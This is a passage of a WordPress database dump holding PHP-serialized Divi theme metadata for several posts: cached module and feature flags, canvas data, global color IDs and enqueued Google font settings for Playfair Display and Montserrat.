:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33911,1536,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33907,1641,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33908,1536,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33903,1318,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33904,1641,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33905,1641,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33906,1641,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33901,1318,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33902,1318,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33898,1249,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33899,1249,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33900,1318,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33894,729,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33895,729,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33896,1249,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33897,1249,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33886,617,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33887,617,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33888,1324,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33889,1324,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33890,1324,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33891,1324,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33892,729,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33893,729,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33882,644,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33883,644,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33884,617,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33885,617,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33875,938,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33876,693,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33877,693,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33878,693,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33879,693,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33880,644,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33881,644,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33871,713,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33872,938,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33873,938,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33874,938,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33868,713,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33869,713,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33870,713,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33866,744,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33867,744,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33855,1623,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33856,910,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33857,910,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33858,910,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33859,910,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33860,935,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33861,935,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33862,935,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1